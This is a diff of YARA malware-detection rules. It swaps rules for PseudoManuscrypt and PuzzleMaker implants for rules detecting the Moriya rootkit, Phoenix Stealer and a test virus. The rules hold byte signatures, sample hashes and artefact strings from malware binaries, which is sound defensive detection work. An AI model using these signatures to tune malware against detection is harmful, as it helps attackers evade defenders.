-		$s1 = { 81 ec 78 0b 00 00 c6 45 c4 00 c6 45 c5 48 c6 45 c6 45 c6 45 c7 64 c6 45 c8 45 c6 45 c9 46 c6 45 ca 45 c6 45 cb 46 c6 45 cc 45 53 c6 45 cd 45 bb 7f 00 00 00 c6 45 ce 45 8a 45 c5 80 7d c4 00 56 57 8b f9 75 2c 33 f6 66 0f 1f 44 00 00 8a 44 35 c5 b9 45 00 00 00 0f b6 c0 2b c8 6b c1 1b 99 f7 fb 8d 42 7f 99 f7 fb 88 54 35 c5 46 83 fe 0a 72 dc 8d 45 c5 89 85 88 f4 ff ff c6 45 b8 00 c6 45 b9 65 c6 45 ba 32 c6 45 bb 45 c6 45 bc 32 c6 45 bd 43 c6 45 be 32 c6 45 bf 6d c6 45 c0 32 c6 45 c1 32 c6 45 c2 32 8a 45 b9 80 7d b8 00 75 29 33 f6 8a 44 35 b9 b9 32 00 00 00 0f b6 c0 2b c8 8d 04 49 c1 e0 03 99 f7 fb 8d 42 7f 99 f7 fb 88 54 35 b9 46 83 fe 0a 72 d9 8d 45 b9 89 85 8c f4 ff ff 8d 8d 34 f7 ff ff c6 85 34 f7 ff ff 00 c6 85 35 f7 ff ff 6d c6 85 36 f7 ff ff 11 c6 85 37 f7 ff ff 54 c6 85 38 f7 ff ff 11 c6 85 39 f7 ff ff 58 c6 85 3a f7 ff ff 11 c6 85 3b f7 ff ff 58 c6 85 3c f7 ff ff 11 c6 85 3d f7 ff ff 5a c6 85 3e f7 ff ff 11 c6 85 3f f7 ff ff 56 c6 85 40 f7 ff ff 11 c6 85 41 f7 ff ff 11 c6 85 42 f7 ff ff 11 8a 85 35 f7 ff ff e8 e2 a2 00 00 89 85 90 f4 ff ff c6 85 c4 f8 ff ff 00 c6 85 c5 f8 ff ff 18 c6 85 c6 f8 ff ff 0c c6 85 c7 f8 ff ff 57 c6 85 c8 f8 ff ff 0c c6 85 c9 f8 ff ff 52 c6 85 ca f8 ff ff 0c c6 85 cb f8 ff ff 52 c6 85 cc f8 ff ff 0c c6 85 cd f8 ff ff 10 c6 85 ce f8 ff ff 0c c6 85 cf f8 ff ff 52 c6 85 d0 f8 ff ff 0c c6 85 d1 f8 ff ff 0c c6 85 d2 f8 ff ff 0c 8a 85 c5 f8 ff ff 80 bd c4 f8 ff ff 00 75 2a 33 c9 66 90 8a 84 0d c5 f8 ff ff 0f b6 c0 83 e8 0c 6b c0 19 99 f7 fb 8d 42 7f 99 f7 fb 88 94 0d c5 f8 ff ff 41 83 f9 0e 72 da 8d 85 c5 f8 ff ff 89 85 94 f4 ff ff c6 85 04 f9 ff ff 00 c6 85 05 f9 ff ff 74 c6 85 06 f9 ff ff 4d c6 85 07 f9 ff ff 23 c6 85 08 f9 ff ff 4d c6 85 09 f9 ff ff 72 c6 85 0a f9 ff ff 4d c6 85 0b f9 ff ff 72 c6 85 0c f9 ff ff 4d c6 85 0d f9 ff ff 5a c6 85 0e f9 ff ff 4d c6 85 0f f9 ff ff 42 c6 85 10 f9 ff ff 4d c6 85 11 f9 ff ff 4d c6 85 12 f9 ff ff 4d 8a 85 05 f9 ff ff 80 bd 04 f9 ff ff 00 75 2c 33 c9 0f 1f 40 00 8a 84 0d 05 f9 ff ff 0f b6 c0 83 e8 4d 6b c0 25 99 f7 fb 8d 42 7f 99 f7 fb 88 94 0d 05 f9 ff ff 41 83 f9 0e 72 da 8d 85 05 f9 ff ff 89 85 98 f4 ff ff c6 85 f4 f8 ff ff 00 c6 85 f5 f8 ff ff 46 c6 85 f6 f8 ff ff 02 c6 85 f7 f8 ff ff 2e c6 85 f8 f8 ff ff 02 c6 85 f9 f8 ff ff 3c c6 85 fa f8 ff ff 02 c6 85 fb f8 ff ff 3c c6 85 fc f8 ff ff 02 c6 85 fd f8 ff ff 43 c6 85 fe f8 ff ff 02 c6 85 }
-		$s2 = { c7 85 b8 f7 ff ff 00 00 00 00 8d 8d 60 f7 ff ff c6 85 60 f7 ff ff 00 c6 85 61 f7 ff ff 36 c6 85 62 f7 ff ff 7a c6 85 63 f7 ff ff 29 c6 85 64 f7 ff ff 7a c6 85 65 f7 ff ff 29 c6 85 66 f7 ff ff 7a c6 85 67 f7 ff ff 69 c6 85 68 f7 ff ff 7a c6 85 69 f7 ff ff 37 c6 85 6a f7 ff ff 7a c6 85 6b f7 ff ff 74 c6 85 6c f7 ff ff 7a c6 85 6d f7 ff ff 0f c6 85 6e f7 ff ff 7a c6 85 6f f7 ff ff 75 c6 85 70 f7 ff ff 7a c6 85 71 f7 ff ff 1d c6 85 72 f7 ff ff 7a c6 85 73 f7 ff ff 00 c6 85 74 f7 ff ff 7a c6 85 75 f7 ff ff 7a c6 85 76 f7 ff ff 7a 8a 85 61 f7 ff ff e8 e7 bb 00 00 6a 07 68 8f cf af 70 ba 19 00 00 00 8b f0 e8 04 db ff ff 83 c4 08 56 ff d0 8b 8d b4 f7 ff ff 8d b5 b8 f7 ff ff 56 ff b5 a8 f7 ff ff 8b 11 6a 00 6a 00 6a 00 6a 00 6a 00 50 51 ff 52 0c 8b f0 c7 85 8c f7 ff ff d6 00 6a 00 8b 85 8c f7 ff ff 99 f7 fb 85 d2 74 50 8b 8d 8c f7 ff ff 8b 85 b8 f7 ff ff 83 c0 02 03 c1 89 85 8c f7 ff ff 8b 85 8c f7 ff ff 25 03 00 00 80 79 05 48 83 c8 fc 40 0f 85 50 01 00 00 66 90 ff 85 8c f7 ff }
-		$s3 = { 75 f5 88 8d 50 f6 ff ff c6 85 51 f6 ff ff 48 c6 85 52 f6 ff ff 20 c6 85 53 f6 ff ff 5e c6 85 54 f6 ff ff 20 c6 85 55 f6 ff ff 7d c6 85 56 f6 ff ff 20 c6 85 57 f6 ff ff 39 c6 85 58 f6 ff ff 20 c6 85 59 f6 ff ff 33 c6 85 5a f6 ff ff 20 c6 85 5b f6 ff ff 2a c6 85 5c f6 ff ff 20 c6 85 5d f6 ff ff 33 c6 85 5e f6 ff ff 20 c6 85 5f f6 ff ff 4d c6 85 60 f6 ff ff 20 c6 85 61 f6 ff ff 6e c6 85 62 f6 ff ff 20 c6 85 63 f6 ff ff 48 c6 85 64 f6 ff ff 20 c6 85 65 f6 ff ff 4d c6 85 66 f6 ff ff 20 c6 85 67 f6 ff ff 1b c6 85 68 f6 ff ff 20 c6 85 69 f6 ff ff 3a c6 85 6a f6 ff ff 20 c6 85 6b f6 ff ff 52 c6 85 6c f6 ff ff 20 c6 85 6d f6 ff ff 47 c6 85 6e f6 ff ff 20 c6 85 6f f6 ff ff 09 c6 85 70 f6 ff ff 20 c6 85 71 f6 ff ff 14 c6 85 72 f6 ff ff 20 c6 85 73 f6 ff ff 7d c6 85 74 f6 ff ff 20 c6 85 75 f6 ff ff 49 c6 85 76 f6 ff ff 20 c6 85 77 f6 ff ff 74 c6 85 78 f6 ff ff 20 c6 85 79 f6 ff ff 1f c6 85 7a f6 ff ff 20 c6 85 7b f6 ff ff 52 c6 85 7c f6 ff ff 20 c6 85 7d f6 ff ff 71 c6 85 7e f6 ff ff 20 c6 85 7f f6 ff ff 5f c6 85 80 f6 ff ff 20 c6 85 81 f6 ff ff 1f c6 85 82 f6 ff ff 20 c6 85 83 f6 ff ff 54 c6 85 84 f6 ff ff 20 c6 85 85 f6 ff ff 33 c6 85 86 f6 ff ff 20 c6 85 87 f6 ff ff 5e c6 85 88 f6 ff ff 20 c6 85 89 f6 ff ff 44 c6 85 8a f6 ff ff 20 c6 85 8b f6 ff ff 0f c6 85 8c f6 ff ff 20 c6 85 8d f6 ff ff 52 c6 85 8e f6 ff ff 20 c6 85 8f f6 ff ff 74 c6 85 90 f6 ff ff 20 c6 85 91 f6 ff ff 13 c6 85 92 f6 ff ff 20 c6 85 93 f6 ff ff 33 c6 85 94 f6 ff ff 20 c6 85 95 f6 ff ff 5e c6 85 96 f6 ff ff 20 c6 85 97 f6 ff ff 52 c6 85 98 f6 ff ff 20 c6 85 99 f6 ff ff 47 c6 85 9a f6 ff ff 20 c6 85 9b f6 ff ff 31 c6 85 9c f6 ff ff 20 c6 85 9d f6 ff ff 5b c6 85 9e f6 ff ff 20 c6 85 9f f6 ff ff 1b c6 85 a0 f6 ff ff 20 c6 85 a1 f6 ff ff 39 c6 85 a2 f6 ff ff 20 c6 85 a3 f6 ff ff 33 c6 85 a4 f6 ff ff 20 c6 85 a5 f6 ff ff 2a c6 85 a6 f6 ff ff 20 c6 85 a7 f6 ff ff 33 c6 85 a8 f6 ff ff 20 c6 85 a9 f6 ff ff 4d c6 85 aa f6 ff ff 20 c6 85 ab f6 ff ff 1f c6 }
+		$s1 = "F:\\meWork\\ksj\\Test\\testVir-ga\\testvir_non\\Debug\\testvir_non.pdb" fullword ascii
+		$s2 = "\\\\.\\pipe\\TESTVIR1PIPE" fullword ascii
+		$s3 = "\\system32\\Hana80.exe" fullword ascii
+		$s4 = "\\system32\\nnr60.exe" fullword ascii
+		$s5 = { 54 45 53 54 56 49 52 31 5f 45 56 45 4e 54 5f 4f 42 4a }
+		$s6 = "INFECT" fullword ascii
+		$s7 = { 54 45 53 54 5f 5f 5f 41 43 43 45 53 53 5f 44 49 52 }
+		$s8 = { 2e 70 69 66 }
+		$s9 = { 2f 2f 2f 2f 44 41 45 4d 4f 4e }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 100KB and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 7 of them
 }
-rule ARKBIRD_SOLG_MAL_Pseudomanuscrypt_Dec_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Moriya_May_2021_2 : FILE
 {
 	meta:
-		description = "Detect PseudoManuscrypt loader dropped by the installer"
+		description = "Detect Moriya rootkit used in the TunnelSnake operation"
 		author = "Arkbird_SOLG"
-		id = "8784baa0-c52c-5ee0-9a92-9b6457df61ed"
-		date = "2021-12-16"
-		modified = "2021-12-17"
-		reference = "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-PseudoManuscrypt-a-mass-scale-spyware-attack-campaign-En.pdf"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-12-16/MAL_PseudoManuscrypt_Dec_2021_1.yara#L1-L22"
+		id = "25cecff1-94f9-5e8d-8758-9b891e9d7373"
+		date = "2020-05-26"
+		modified = "2021-05-27"
+		reference = "https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-26/Moriya/MAL_Moriya_May_2021_2.yara#L1-L22"
 		license_url = "N/A"
-		logic_hash = "e304323ed26c7040c97efa8041bcd3eb2f6d0caeba76d6674fc2947d7850e830"
+		logic_hash = "11ef00940604c3337b1c8c00903297343cfd4e8f3899b949d58e4203ab68d3fd"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "19627bcee38a4ca5ae9a60c71ee7a2e388ba99fb8b229700a964a084db236e1f"
-		hash2 = "be94df270acfc8e5470fa161b808d0de1c9e85efeeff4a5d82f5fd09629afa8e"
-		hash3 = "de965e33dff58cf011106feacef2f804d9e35d00b8b5ff7064e5b7afee46d72c"
-		hash4 = "e32899bef78f6af4a155f738298e042f72fe5e643ec934f8778180f71e511727"
-		tlp = "white"
-		adversary = "-"
+		hash1 = "ce21319bd21f76ab0f188a514e8ab1fe6f960c257475e45a23d11125d78df428"
+		tlp = "White"
+		adversary = "Chinese APT Group"
 
 	strings:
-		$s1 = { 53 4f 46 54 57 41 52 45 5c 4d 69 63 72 6f 73 6f 66 74 5c 43 72 79 70 74 6f 67 72 61 70 68 79 00 7b 47 36 35 37 59 53 30 36 2d 30 31 36 44 2d 34 43 30 52 2d 36 30 32 32 2d 46 47 45 32 43 33 32 32 36 36 37 46 7d 00 00 4d 61 63 68 69 6e 65 47 75 69 64 }
-		$s2 = { 45 ?? 5c 43 4c 53 c7 45 ?? 49 44 5c 25 c7 45 ?? 73 00 00 00 c7 45 ?? 47 6c 6f 62 c7 45 ?? 61 6c }
-		$s3 = { 56 69 72 74 c7 [2-4] 75 61 6c 41 c7 [2-4] 6c 6c 6f 63 ff 15 }
-		$s4 = { 4c 6f 61 64 65 72 2e 64 6c 6c 00 53 65 72 76 69 63 65 4d 61 69 6e }
-		$s5 = { 2e 72 73 72 63 24 30 31 00 00 00 00 a0 ?? 00 00 ?? 04 00 00 2e 72 73 72 63 24 30 32 }
+		$seq1 = { 8b 35 c4 30 40 00 8d 45 dc 68 92 24 40 00 50 ff d6 68 cc 24 40 00 8d 45 e4 50 ff d6 68 58 42 40 00 57 57 6a 22 8d 45 dc 50 57 53 ff 15 5c 30 40 00 8b f0 85 f6 0f 88 0a ff ff ff a1 58 42 40 00 83 48 1c 04 8d 45 dc 50 8d 45 e4 50 ff 15 60 30 40 00 e8 b2 00 00 00 }
+		$seq2 = { 68 3c 24 40 00 50 ff 15 c4 30 40 00 8d 85 d8 fe ff ff 50 ff 15 bc 30 40 00 85 c0 74 1b 8d 8d e0 fe ff ff 51 ff d0 8b 8d e4 fe ff ff 8b 85 e8 fe ff ff 0f b7 5d f4 eb 28 53 8d 85 cc fe ff ff 50 8d 85 d4 fe ff ff 50 8d 85 d0 fe ff ff 50 ff 15 ac 30 40 00 8b 8d d0 fe ff ff 8b 85 d4 fe ff ff c1 e1 08 0f b6 c0 0b c1 0f b6 cb }
+		$seq3 = { 8b 75 c0 8d 45 cc 50 ff 15 94 30 40 00 8b 5d c8 8b 43 0c 8b 55 bc 89 42 20 8b 43 08 89 42 1c 80 62 03 0f 8a 43 10 24 0f 08 42 03 8b 4b 08 85 c9 74 30 80 7e 24 00 74 06 f6 43 10 20 75 17 8b 46 18 85 c0 78 0a f6 43 10 40 75 0a 85 c0 79 20 f6 43 10 80 74 1a ff 73 0c 56 ff 75 b4 ff d1 8b f8 eb 0d 80 7e 21 00 74 07 8b 46 60 80 48 03 01 68 74 6e 68 00 53 ff 15 b4 30 40 00 }
+		$seq4 = { 6a 79 68 78 6f 00 00 68 72 70 00 00 6a 69 68 73 6e 00 00 6a 5c 68 72 65 00 00 6a 76 68 69 72 00 00 68 44 5c 00 00 50 e8 a2 f8 ff ff 83 c4 30 8d 85 7c ff ff ff 50 8d 85 6c ff ff ff 50 ff 15 c4 30 40 00 a1 88 30 40 00 68 34 42 40 00 56 56 ff 30 8d 85 6c ff ff ff 56 56 6a 40 50 ff 15 90 30 40 00 }
+		$seq5 = { 55 8b ec 81 ec 28 01 00 00 a1 04 40 40 00 33 c5 89 45 fc 8b 45 08 53 8b 5d 10 56 8b 75 0c 57 89 85 e8 fe ff ff 8d 7d 88 8b 45 14 6a 07 89 85 e4 fe ff ff 33 c0 59 f3 ab 33 ff 89 b5 d8 fe ff ff 68 94 00 00 00 8d 85 f0 fe ff ff 89 bd ec fe ff ff 57 50 e8 48 03 00 00 6a 06 89 7d e0 33 c0 59 8d 7d e4 f3 ab 33 ff 8d 45 a8 6a 38 57 50 89 7d a4 e8 2a 03 00 00 89 bd dc fe ff ff 8d 45 84 89 bd e0 fe ff ff 83 c4 18 89 bd dc fe ff ff 89 bd e0 fe ff ff 8d 7d 84 a5 ff b5 e4 fe ff ff 50 a5 53 a5 a5 c7 45 98 68 1b }
+		$s1 = "\\Device\\MoriyaStreamWatchmen" fullword wide
+		$s2 = "Moriya Filter" fullword wide
+		$s3 = "Moriya Callout" fullword wide
+		$s4 = "\\DosDevices\\MoriyaStreamWatchmen" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 3KB and filesize < 30KB and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 6KB and ( 3 of ( $seq* ) or 2 of ( $s* ) )
 }
-rule ARKBIRD_SOLG_APT_Puzzlemaker_Implant_Jun_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Moriya_May_2021_1 : FILE
 {
 	meta:
-		description = "Detect the implant of the PuzzleMaker group"
+		description = "Detect Moriya rootkit used in the TunnelSnake operation"
 		author = "Arkbird_SOLG"
-		id = "9387130c-4474-55bf-9736-09494a5e81b8"
-		date = "2021-06-10"
-		modified = "2021-11-01"
-		reference = "https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-09/PuzzleMaker/APT_PuzzleMaker_Implant_Jun_2021_1.yara#L1-L21"
+		id = "6a78ddc0-b39f-5aec-9c54-980854173abf"
+		date = "2020-05-07"
+		modified = "2021-05-26"
+		reference = "https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-26/Moriya/MAL_Moriya_May_2021_1.yara#L1-L27"
 		license_url = "N/A"
-		logic_hash = "e54eaaa76b2d370a27a232dee2299266f8b3b82d53da36e35c2a6fcdd7d5b1f7"
+		logic_hash = "f73049f261428c8921a2c8a86fb5d242719e5dc9f30a5c58e86be1a79d84a42d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "8a17279ba26c8fbe6966ea3300fdefb1adae1b3ed68f76a7fc81413bd8c1a5f6"
-		hash2 = "1ee9bb4e8bcabe197399b654dbf940438b120af1c376719ff9bdccf2bb1dc606"
-		hash3 = "f2ce2a00de8673f52d37911f3e0752b8dfab751b2a17e719a565b4083455528e"
+		hash1 = "3eda93de4a1e7a35c040fad914a4885d079ffc3c1362153b74e10ff9121de22b"
+		hash2 = "d620f9c32adc39b0632f22ec6a0503bf906fd1357f4435463fbb4b422634a536"
 		tlp = "White"
-		adversary = "PuzzleMaker"
+		adversary = "Chinese APT Group"
 
 	strings:
-		$s1 = { 4c 8d 4c 24 5c 49 8b ce 48 8d 95 c0 00 00 00 ff 15 21 01 04 00 85 c0 74 28 4c 8d 4c 24 58 4c 89 64 24 20 41 b8 00 04 00 00 48 8d 95 c0 04 00 00 49 8b cf ff 15 b5 fe 03 00 85 c0 0f 85 25 ff ff ff ff 15 77 fe 03 00 8b }
-		$s2 = { 40 55 53 56 41 55 41 57 48 8d ac 24 a0 fe ff ff 48 81 ec 60 02 00 00 48 8b 05 5a 1c 03 00 48 33 c4 48 89 85 30 01 00 00 48 8b 85 b0 01 00 00 4c 8b f9 48 8b b1 b8 00 00 00 4c 8b ad c8 01 00 00 48 83 c6 07 48 89 44 24 60 48 8b 85 d0 01 00 00 48 89 45 98 8b 85 c0 01 00 00 83 c0 fd 48 c1 ee 03 4c 89 4d 80 4c 89 45 88 48 89 55 90 83 f8 06 0f 87 84 03 00 00 48 8d 15 f3 6b fd ff 48 98 8b 8c 82 b0 97 02 00 48 }
-		$s3 = { 48 8d 1d 98 3d 02 00 0f 57 c0 48 89 bc 24 58 02 00 00 33 c0 c7 44 24 68 01 00 00 00 0f 11 85 80 00 00 00 4c 8b c6 c7 85 8c 00 00 00 10 27 00 00 48 8d 95 a0 00 00 00 48 89 44 24 70 49 8b c9 48 89 44 24 78 0f 11 45 20 0f 11 45 30 0f 11 45 40 0f 11 45 50 0f 11 45 60 0f 11 45 70 0f 11 85 90 00 00 00 e8 57 58 fe ff 8b f8 85 c0 0f 85 62 02 00 00 49 8b 87 b8 00 00 00 48 8d 4c 24 68 48 8b 54 24 60 48 83 c0 07 48 c1 e8 03 4c 89 a4 24 50 02 00 00 4c 8b a5 b8 01 00 00 4c 3b e0 4c 89 b4 24 48 02 00 00 4d 8b f4 4c 0f 47 f0 4d 8b c6 e8 1b 57 fe ff 8b f8 85 c0 75 54 49 8b 87 b8 00 00 00 4a 8d 14 f5 00 00 00 00 48 }
-		$s4 = { 85 ff 0f 85 cd 01 00 00 48 8b 4d 90 48 8d 45 a0 48 89 44 24 50 45 33 c9 48 8d 45 d0 4d 8b c7 48 89 44 24 48 33 d2 4c 89 64 24 40 4c 89 64 24 38 c7 44 24 30 00 00 00 08 c7 44 24 28 01 00 00 00 4c 89 64 24 20 ff 15 62 1c 04 00 85 c0 75 3a ff 15 38 1d 04 00 44 8b c3 48 8b ce 8b d0 8b f8 e8 d1 09 00 00 48 8b 4d 80 ff 15 07 1d 04 00 48 8b 4d 88 ff 15 fd 1c 04 00 48 8b 4d 90 ff 15 f3 1c 04 00 }
-		$s5 = { 40 53 55 56 57 41 54 41 55 41 56 41 57 48 81 ec 28 02 00 00 48 8b 05 5d 0a 04 00 48 33 c4 48 89 84 24 10 02 00 00 48 8b ac 24 90 02 00 00 0f 57 c0 4c 8b ac 24 98 02 00 00 33 db 45 32 e4 4c 89 4c 24 58 4c 89 44 24 70 49 8b f9 48 89 6c 24 68 4d 8b c8 4c 89 6c 24 60 4c 8b fa 48 8b f1 44 8b f3 0f 11 84 24 e0 00 00 00 c7 84 24 ec 00 00 00 10 27 00 00 0f 11 84 24 80 00 00 00 0f 11 84 24 90 00 00 00 0f 11 84 24 a0 00 00 00 0f 11 84 24 b0 00 00 00 0f 11 84 24 c0 00 00 00 0f 11 84 24 d0 00 00 00 0f 11 84 24 f0 00 00 00 48 85 ed 75 47 4c 8b 81 b8 00 00 00 48 8d 05 a1 c2 ff ff 48 89 44 24 68 48 8d 8c 24 80 00 00 00 49 83 c0 07 48 8d 84 24 80 00 00 00 49 c1 e8 03 49 8b d1 48 89 44 24 60 e8 87 c2 ff ff 8b f8 85 c0 0f 85 ee 01 00 00 48 8b 7c 24 58 48 8d 56 68 48 8d 4f 18 e8 7b 4a ff ff 85 c0 75 15 48 8d 56 50 48 8b cf e8 6b 4a ff ff 85 c0 75 05 40 b5 }
-		$s6 = { 41 b9 01 00 00 00 c7 44 24 20 00 00 00 f0 45 33 c0 48 8d 4c 24 60 33 d2 ff 15 11 06 04 00 85 c0 74 28 48 8b 4c 24 60 4c 8d 85 b0 00 00 00 ba 20 00 00 00 ff 15 ee 05 04 00 48 8b 4c 24 60 33 d2 85 }
+		$seq1 = { 4c 8d 05 13 10 00 00 ff 15 95 12 00 00 48 8d 15 36 10 00 00 48 8d 4d c0 ff 15 fc 12 00 00 48 8d 15 65 10 00 00 48 8d 4d d0 ff 15 eb 12 00 00 48 8d 05 cc 23 00 00 41 b9 22 00 00 00 48 89 44 24 30 4c 8d 45 c0 c6 44 24 28 00 33 d2 83 64 24 20 00 48 8b cb ff 15 f0 11 00 00 33 d2 41 8b ce 8b f8 85 c0 79 09 4c 8d 05 6e }
+		$seq2 = { 4c 8d 05 85 10 00 00 ff 15 27 12 00 00 48 8b 05 80 23 00 00 48 8d 55 c0 48 8d 4d d0 83 48 30 04 ff 15 be 11 00 00 e8 c5 01 00 00 33 d2 41 8b ce 85 c0 79 0c }
+		$seq3 = { 33 db 48 8b 74 24 30 4c 8b 7c 24 38 48 8b 7c 24 40 4c 8b 64 24 48 4d 8b ec 48 8d 4c 24 58 ff 15 b7 1c 00 00 48 8b 46 10 49 89 44 24 f8 48 8b 46 08 49 89 45 f0 41 80 65 bb 0f 8a 46 18 24 0f 41 08 45 bb 4c 8b 4e 08 }
+		$seq4 = { 48 83 64 24 58 00 ba 44 5c 00 00 c7 44 24 50 79 00 00 00 41 b9 76 00 00 00 c7 44 24 48 78 6f 00 00 41 b8 69 72 00 00 c7 44 24 40 72 70 00 00 c7 44 24 38 69 00 00 00 c7 44 24 30 73 6e 00 00 c7 44 24 28 5c 00 00 00 c7 44 24 20 72 65 00 00 e8 03 f6 ff ff 48 8d 55 80 48 8d 4c 24 70 ff 15 74 17 00 00 48 8d 05 2d 28 00 00 45 33 c9 48 89 44 24 38 45 33 c0 48 8b 05 eb 16 00 00 48 83 64 24 30 00 c6 44 24 28 00 41 8d 51 40 48 8b 08 48 89 4c 24 20 48 8d 4c 24 70 ff 15 d9 16 00 00 85 c0 78 31 48 8b 0d ee 27 00 00 48 8b 81 e0 00 00 00 48 89 05 d8 27 00 00 48 8d 05 19 f7 ff ff 87 81 e0 00 00 00 48 8b 0d cc 27 00 00 ff 15 c6 16 00 00 33 c0 48 8b 4d 00 48 33 cc e8 58 0b 00 00 48 81 c4 10 01 00 }
+		$seq5 = { 40 55 53 56 57 41 56 48 8d ac 24 40 ff ff ff 48 81 ec c0 01 00 00 48 8b 05 47 1e 00 00 48 33 c4 48 89 85 b8 00 00 00 48 83 64 24 38 00 49 8b d8 48 83 64 24 50 00 48 8b fa 48 8b f1 33 d2 41 b8 c8 00 00 00 48 8d 4c 24 60 4d 8b f1 e8 0b 06 00 00 33 c0 48 8d 4d 30 0f 57 c0 48 89 85 b0 00 00 00 33 d2 0f 11 85 90 00 00 00 44 8d 40 58 0f 11 85 a0 00 00 00 e8 e2 05 00 00 0f 10 07 48 83 64 24 20 00 48 8d 05 72 f8 ff ff 48 89 44 24 40 48 8d 54 24 28 48 8d 05 81 fd ff ff 4d 8b c6 48 8b cb 48 89 44 24 48 f3 0f 7f 44 24 28 e8 13 05 00 00 8b d8 85 c0 0f 88 da 00 00 00 0f 10 07 48 8b 0d f7 1f 00 00 48 8d 05 30 0a 00 00 45 33 c9 48 89 45 40 f3 0f 7f 45 30 45 33 c0 48 8d 55 30 0f 10 06 48 89 45 48 f3 0f 7f 45 70 e8 22 05 00 00 8b d8 85 c0 0f 88 93 00 00 00 0f 10 06 83 65 c0 00 48 8d 05 14 0a 00 00 0f 10 0d 5d 0f 00 00 83 a5 a0 00 00 00 00 48 8d 54 24 60 48 8b 0d 9a 1f 00 00 45 33 c9 f3 0f 7f 45 a0 48 89 44 24 70 45 33 c0 0f 10 07 48 89 44 24 78 48 8d 85 90 00 00 00 48 89 45 d8 48 8d 44 24 20 f3 0f 7f 45 e4 c7 45 e0 03 50 00 00 0f 10 05 ff 0e 00 00 c7 45 d0 01 00 00 00 f3 0f 7f 8d 90 00 00 00 c7 85 a8 00 00 00 00 01 00 00 f3 0f 7f 45 b0 48 89 85 b0 00 00 00 e8 91 04 00 00 8b d8 85 c0 79 08 41 8b 0e e8 35 04 00 00 8b c3 48 8b 8d b8 00 00 00 48 33 cc e8 96 02 00 00 48 81 c4 c0 01 00 00 41 5e 5f 5e 5b }
+		$s1 = "Moriya : NotifyFunction\n" fullword ascii
+		$s2 = "Moriya Filter" fullword wide
+		$s3 = "Moriya : DeviceControlDispatch!\n" fullword ascii
+		$s4 = "Moriya : Waiting...\n" fullword ascii
+		$s5 = "Moriya : WriteDispatch!\n" fullword ascii
+		$s6 = { 5c 00 44 00 65 00 76 00 69 00 63 00 65 00 5c 00 4d 00 6f 00 72 00 69 00 79 00 61 00 53 00 74 00 72 00 65 00 61 00 6d 00 57 00 61 00 74 00 63 00 68 00 6d 00 65 00 6e }
+		$s7 = { 5c 00 44 00 6f 00 73 00 44 00 65 00 76 00 69 00 63 00 65 00 73 00 5c 00 4d 00 6f 00 72 00 69 00 79 00 61 00 53 00 74 00 72 00 65 00 61 00 6d 00 57 00 61 00 74 00 63 00 68 00 6d 00 65 00 6e }
+		$s8 = "Moriya start\n" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 80KB and 5 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 6KB and ( 3 of ( $seq* ) or 6 of ( $s* ) )
 }
-rule ARKBIRD_SOLG_APT_Puzzlemaker_Launcher_Jun_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Phoenix_Stealer_Jun_2021_1 : FILE
 {
 	meta:
-		description = "Detect the launcher of the PuzzleMaker group"
+		description = "Detect the Phoenix Stealer"
 		author = "Arkbird_SOLG"
-		id = "ae31d9de-8e6c-5c1b-bc45-bc4e50cea00f"
-		date = "2021-06-10"
+		id = "8c9df216-cbfe-51f3-a6d7-cfeb99fafbe0"
+		date = "2021-11-01"
 		modified = "2021-11-01"
-		reference = "https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-09/PuzzleMaker/APT_PuzzleMaker_Launcher_Jun_2021_1.yara#L1-L19"
+		reference = "https://twitter.com/3xp0rtblog/status/1455111070566207493/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-01/Phoenix_Stealer/MAL_Phoenix_Stealer_Jun_2021_1.yara#L1-L20"
 		license_url = "N/A"
-		logic_hash = "5c717ca5c57a86e1b5db45b3d581a45be248d45820c00c40c57a001ac07ce1b2"
+		logic_hash = "989c2518a42201559265ce4b974b35df5c4b8365e53f789fc124ee969e747c87"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "982f7c4700c75b81833d5d59ad29147c392b20c760fe36b200b541a0f841c8a9"
+		hash1 = "5bbfeee67b9b087ed228eccdacd4a7e71d40f7f96ad869903e02d9c3b02adbe5"
+		hash2 = "34f78f4028c51f6340c1f4846b65252fa6686ba0a5ab8ebc35c737a8960ba43e"
+		hash3 = "e51de8c43034fafaa49f81e9cc955c0cf60dc9684f28d8c355baf0724710de1f"
 		tlp = "White"
-		adversary = "PuzzleMaker"
+		adversary = "-"
 
 	strings:
-		$s1 = { 4c 89 6d bf 48 8d 45 bf 48 89 44 24 20 4c 8d 0d f9 45 01 00 33 d2 44 8d 42 01 48 8d 0d dc 45 01 00 ff 15 56 44 01 00 8b d8 85 c0 78 c6 4c 89 6d c7 48 8b 45 bf 48 8b 08 4c 8b 79 18 b9 18 00 00 00 e8 9b 04 00 00 48 8b d8 48 89 45 a7 48 85 c0 74 32 0f 57 c0 33 c0 0f 11 03 48 89 43 10 4c 89 6b 08 c7 43 10 01 00 00 00 48 8d 0d 15 fb 01 00 ff 15 cf 43 01 00 48 89 03 48 85 }
